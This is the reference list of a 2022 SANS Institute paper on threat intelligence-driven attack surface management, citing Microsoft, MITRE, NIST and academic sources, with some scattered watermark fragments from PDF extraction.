Lin, H., Burnett, D., Sheaffer, D. A., & Arnold, E. (2009). Applying decision analysis process to exterior physical security system technology design and selection. 43rd Annual 2009 International Carnahan Conference on Security Technology, 312-316. doi.org/10.1109/CCST.2009.5335519
Mavroeidis, V., Hohimer, R., Casey, T., & Jøsang, A. (2021). Threat actor type inference and characterization within cyber threat intelligence. 2021 13th International Conference on Cyber Conflict (CyCon). doi.org/10.23919/CyCon51939.2021.9468305
McAfee Enterprise [McAfee], & FireEye. (2021, November 9). Cyber threats have increased 81% since global pandemic. perma.cc/7L8W-KXX7
McMillan, R., Poulsen, K., & Volz, D. (2022, March 28). Secret world of pro-Russia hacking group exposed in leak. The Wall Street Journal [WSJ]. perma.cc/S7WP-PJ9T
Microsoft Corp. [Microsoft]. (2019). Why use Jupyter for security investigations? msticpy 1.7.5 documentation. perma.cc/Q467-DDTS
Microsoft. (2020, September 22). Microsoft delivers unified SIEM and XDR to modernize security operations. Microsoft Security Blog. perma.cc/V6A5-JDKG
Microsoft. (2021, April 1) [2021a]. Automating threat actor tracking: Understanding attacker behavior for intelligence and contextual alerting. Microsoft Security Blog. perma.cc/3W4Z-6M3R
Microsoft. (2021, August 13) [2021b]. Attackers use Morse code, other encryption methods in evasive phishing campaign. Microsoft Security Blog. perma.cc/A6EB-TH25

Microsoft. (2021, October) [2021c]. Microsoft digital defense report. Microsoft Security. perma.cc/AY24-ZQ73
Microsoft. (2021, November 18) [2021d]. Connect your threat intelligence platform to Microsoft Sentinel. Microsoft Docs. perma.cc/8MM7-DU9R
Microsoft. (2021, November 19) [2021e]. External attack surface management: Intelligent defense in the age of digital transformation. perma.cc/UA9H-4VYA
Microsoft. (2021, December 11) [2021f]. Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability. perma.cc/JY7A-8WYQ
Microsoft. (2022, January 11) [2022a]. Inside Microsoft 365 Defender: Mapping attack chains from cloud to endpoint. Microsoft Security Blog. perma.cc/55B5-UXXD
Microsoft. (2022, March 7) [2022c]. Kusto Query Language (KQL) overview. Azure Data Explorer, Microsoft Docs. perma.cc/3VVG-ZFN6
Microsoft. (2022, April 19) [2022f]. The mobile attack surface goes beyond major mobile app stores. Security Insider. perma.cc/PH89-ZND8
Microsoft. (2022, April 19) [2022g]. Anatomy of an external attack surface: Threat actors don't have to compromise assets to attack an organization or its customers. perma.cc/GSE5-MZGR
Microsoft. (2022, May 9) [2022d]. Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself. Microsoft Security Blog. perma.cc/EBW7-U9SK
Microsoft. (2022, May 11) [2022h]. Failure modes in machine learning. Security documentation, Microsoft Docs. perma.cc/AX6S-A8HZ
Microsoft. (2022, May 17) [2022i]. Understand and use attack surface reduction (ASR). Microsoft Docs. perma.cc/D9DH-T55Z
Microsoft. (2022, June 14) [2022e]. Threat intelligence integration in Microsoft Sentinel. Microsoft Docs. perma.cc/2S6G-L7LS
Microsoft Threat Intelligence Center [MSTIC]. (2021, April 27). MSTICPy v1.0.0 and Jupyter notebooks in Azure Sentinel, an update. perma.cc/9ANN-QL3T

Li, M., Jia, W., & Zhao, W. (2001). Decision analysis of network-based intrusion detection systems for denial-of-service attacks. 2001 International Conferences on Info-Tech and Info-Net: Proceedings (Cat. No. 01EX479), 5, 1-6. doi.org/10.1109/ICII.2001.983485
The MITRE Corp. [MITRE]. (2021, June 22). CVE-2021-35244. perma.cc/LGF4-2CKH
MITRE. (2022, February 10). After SolarWinds, tamper proofing the cyber ecosystem. perma.cc/HNX5-7TY8
MITRE. (n.d.). MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) case studies. perma.cc/JX5S-LGEF
MITRE. (n.d.). MITRE ATT&CK®. perma.cc/GWW8-NTCC
Mohanani, R., Salman, I., Turhan, B., Rodríguez, P., & Ralph, P. (2020). Cognitive biases in software engineering: A systematic mapping study. IEEE Transactions on Software Engineering, 46(12), 1318-1339. doi.org/10.1109/TSE.2018.2877759
National Institute of Standards and Technology [NIST]. (2011a). Managing information security risk: Organization, mission, and information system view (NIST Special Publication 800-39). U.S. Department of Commerce. doi.org/10.6028/NIST.SP.800-39
NIST. (2012b). Guide for conducting risk assessments (NIST Special Publication 800-30).
NIST. (2016c). Cyber supply chain risk management. perma.cc/W8LD-R7Q7
NIST. (2021d). Operational technology security. NIST Computer Security Resource Center (CSRC). perma.cc/T9CB-5AFE
NIST. (n.d.). Attack surface. In Glossary, NIST Computer Security Resource Center (CSRC). perma.cc/92GL-KU27
Parkinson, S., Crampton, A., & Hill, R. (2018). Guide to vulnerability analysis for computer networks and systems: An artificial intelligence approach (Springer Computer Communications and Networks series). doi.org/10.1007/978-3-319-92624-7
PCI Pal. (2019, September 17). New global research shows poor data security practices have serious consequences for businesses worldwide [Press release]. perma.cc/YL3K-96BN

Shoard, P., & Handa, S. (2021). Hype cycle for security operations, 2021 (ID No. G00747546). Gartner. perma.cc/6XBU-LPEF
Rose, S., Borchert, O., Mitchell, S., & Connelly, S. (2020). Zero trust architecture (NIST Special Publication 800-207). NIST. doi.org/10.6028/NIST.SP.800-207
Roy, S., Sharmin, N., Acosta, J. C., Kiekintveld, C., & Laszka, A. (2022). Survey and taxonomy of adversarial reconnaissance techniques. ACM Computing Surveys. doi.org/10.1145/3538704
Sargent, J. (2022, February 16). Security perimeter is no more as attack surface continues to expand. SD Times. perma.cc/2PSY-8K4F
Schaberreiter, T., Kupfersberger, V., Rantos, K., Spyros, A., Papanikolaou, A., Ilioudis, C., & Quirchmayr, G. (2019). A quantitative evaluation of trust in the quality of cyber threat intelligence sources. Proceedings of the 14th International Conference on Availability, Reliability and Security. doi.org/10.1145/3339252.3342112
Schlette, D., Caselli, M., & Pernul, G. (2021). A comparative study on cyber threat intelligence: The security incident response perspective. IEEE Communications Surveys & Tutorials, 23(4), 2525-2556. doi.org/10.1109/COMST.2021
Shankar, R., Kumar, S., & Johnson, A. (2020, October 22). Cyberattacks against machine learning systems are more common than you think [Blog post]. perma.cc/PQW3-CADE
Shreeve, B., Hallett, J., Edwards, M., Anthonysamy, P., Frey, S., & Rashid, A. (2021). "So if Mr Blue Head here clicks the link...": Risk thinking in cyber security decision making. ACM Transactions on Privacy and Security, 24(1), 1-29. doi.org/10.1145/3419101
Siddaway, A. P., Wood, A. M., & Hedges, L. V. (2019). How to do a systematic review: A best practice guide for conducting and reporting narrative reviews, meta-analyses, and meta-syntheses. Annual Review of Psychology, 70, 747-770. doi.org/10.1146/annurev-psych-010418-102803
Silver, G. (2021, April 26). Managing cybersecurity risk: Four options for CEOs, CFOs, and risk officers. Forbes Technology Council. perma.cc/V2CF-ZXUK

Souppaya, M., & Scarfone, K. (2022). Guide to enterprise patch management planning: Preventive maintenance for technology (NIST Special Publication 800-40, Rev. 4). NIST. doi.org/10.6028/NIST.SP.800-40r4
Stine, K. M., Quinn, S. D., Ivy, N., Feldman, L., Witte, G. A., & Gardner, R. (2020). Integrating cybersecurity and enterprise risk management (ERM) (NISTIR 8286). NIST. doi.org/10.6028/NIST.IR.8286
Stine, K. M., Quinn, S. D., Ivy, N., Barrett, M., Feldman, L., Witte, G. A., & Gardner, R. (2021). Identifying and estimating cybersecurity risk for enterprise risk management (ERM) (NISTIR 8286A). NIST. doi.org/10.6028/NIST.IR.8286A
Smith, G. S. (2022). The new normal in IT: How the global pandemic changed information technology forever. Wiley.
Spring, J., Hatleback, E., Householder, A., Manion, A., & Shick, D. (2021). Time to change the CVSS? IEEE Security & Privacy, 19(2), 74-78. doi.org/10.1109/MSEC.2020.3044475
Spring, J. M. (2022). An analysis of how many undiscovered vulnerabilities remain in information systems. perma.cc/X8HF-3A83
The Open Group [Open Group]. (2021). Zero trust commandments. perma.cc/M2UQ-AZG5
Wang, Y., Zhou, N. Z., Zhang, N., Liu, D., Xing, R., Luan, T. H., & Shen, X. (2022, April 8). A survey on Metaverse: Fundamentals, security, and privacy. doi.org/10.48550/arXiv.2203.02662
The White House. (2021, October 1). Statement by President Joe Biden on Cybersecurity Awareness Month. perma.cc/77NB-S4YW
Wilburn, D., & Schmidt, C. (2022, March 15). Log4Shell and endemic vulnerabilities in open-source libraries. perma.cc/M7BL-Q7GY
Yale, N., & Zonghao, Y. (2021, January 18). Backdoor attack on deep learning models in mobile apps. perma.cc/X27Q-62CZ
Yeboah-Ofori, A., et al. (2021). Cyber threat predictive analytics for improving cyber supply chain security. IEEE Access, 9, 94318-94337. doi.org/10.1109/ACCESS.2021.3087109

Jonathan Matkowsky, [email protected]


© 2022 The SANS Institute Author retains full rights.
ts
Threat Intelligence-Driven Attack Surface Management 29

gh
Ri
Yin, Z., Xu, Y., Ma, F., Gao, H., Qiao, L., & Jiang, Y. (2022). Scanner++: Enhanced
vulnerability detection of web applications with attack intent synchronization. ACM

ll
Fu
Transactions on Software Engineering and Methodology. doi.org/10.1145/3517036
Zbakh, M., Elmahdi, K., Cherkaoui, R., & Enniari, S. (2015). A multi-criteria analysis of

ns
intrusion detection architectures in cloud environments. 2015 International

ai
et
Conference on Cloud Technologies and Applications (CloudTech).

rR
doi.org/10.1109/cloudtech.2015.7336967

ho
ut
,A
te
itu
st
In
NS
SA
e
Th
22
20
©

Jonathan Matkowsky, [email protected]


© 2022 The SANS Institute Author retains full rights.

You might also like